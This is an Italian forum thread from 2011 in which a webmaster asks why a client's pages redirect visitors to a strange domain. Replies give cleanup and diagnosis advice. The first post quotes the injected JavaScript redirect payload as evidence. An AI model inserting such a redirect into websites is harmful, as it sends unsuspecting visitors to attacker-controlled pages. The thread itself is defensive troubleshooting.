codice estraneo nelle pagine

**verardoelvis** · 25-01-2011, 18:02

Ciao, ho un problema strano su un hosting di un cliente.
Quando un utente accede alle pagine dinamiche del suo sito viene mandato in un sito strano (http://84f6a4eef61784b33e4acbd32c8fd...22a3c4880152d8) che non esiste, oppure si blocca la visualizzazione di una parte del sito stesso.

Ho verificato e negli script non è presente nulla di strano, mentre a run-time, nel sorgente della pagina vedo questa stringa:

codice:

<script type='text/javascript'>document.location.href='http://84f6a4eef61784b33e4acbd32c8fdd72.com/'+Math.floor(Math.random()*10000);</script>

Come risolvo?
Perchè è lì?

Ho fatto scansioni sul server e non ho trovato niente.
è l'unico sito che ha questo problema anche se ce ne sono altri creati dalla stessa "mano".

Grazie.
Ciao

**bstefano79** · 25-01-2011, 18:19

io credo sia opera di un qualche hacker/spammer

controlla in tutti i file che contengono document.location.href finchè non trovi quello "infettato"

**king size slim** · 25-01-2011, 18:20

ti hanno bucato il sito, devi esaminare il log per capire come hanno iniettato quel codice, quasi sicuramente hanno sfruttato una vulnerabilità in qualche script...

controlla le date di ultima modifica dei file finché non trovi quello modificato, dopodiché esamina i log per capire come hanno fatto...

**verardoelvis** · 25-01-2011, 18:29

ciao, quindi potrebbe bastare uploadare nuovamente tutto il codice?
ciao

**king size slim** · 25-01-2011, 18:30

se hanno sfruttato una vulnerabilità e uploadi nuovamente tutto il codice lo rifaranno, devi prima trovare la falla...

**bstefano79** · 25-01-2011, 18:50

Originariamente inviato da verardoelvis
ciao, quindi potrebbe bastare uploadare nuovamente tutto il codice?
ciao

come misura temporanea si, ma vedrai che prima o poi (speriamo poi) risuccederà

**verardoelvis** · 05-02-2011, 20:48

ciao, purtroppo non mi funziona ancora.

ho provato a ricaricare alcuni file ma non ho notato nessun miglioramento.
e anche mettendo l'intera cartella del sito sotto un altro sito per prova non cambia niente.
come se le pagine fossero realmente modificate ma dentro non c'è il codice che fa il redirect!!!!
anche nelle pagine ricaricate (che in locale non hanno problemi).

non sono più cosa fare.
sto facendo scansioni ma ninete.

cosa posso fare?

ciao

**simo22** · 05-02-2011, 20:53

Puoi mettere il codice?
Perchè io non ho altre soluzioni...

Se ci dai pure il link della pagina dove hai il problema...

**Dascos** · 05-02-2011, 21:15

Prova a cercare anche base64encode e simili, nonchè "iframe"...

**brodik** · 06-02-2011, 14:50

molto probabile che il codice in questione si trovi in un file .htaccess se sei su apache..

P.S.: md5(84f6a4eef61784b33e4acbd32c8fdd72) = antivirus

EDIT:

hai PHPMyAdmin installato?

molto probabile che sia colpa sua se hai installato una di queste versioni:
2.11.x fino a 2.11.9.5
3.x fino a 3.1.3.1

exploit link

Discussione: codice estraneo nelle pagine

Strumenti discussione

Ricerca discussione

Visualizza

codice estraneo nelle pagine

Permessi di invio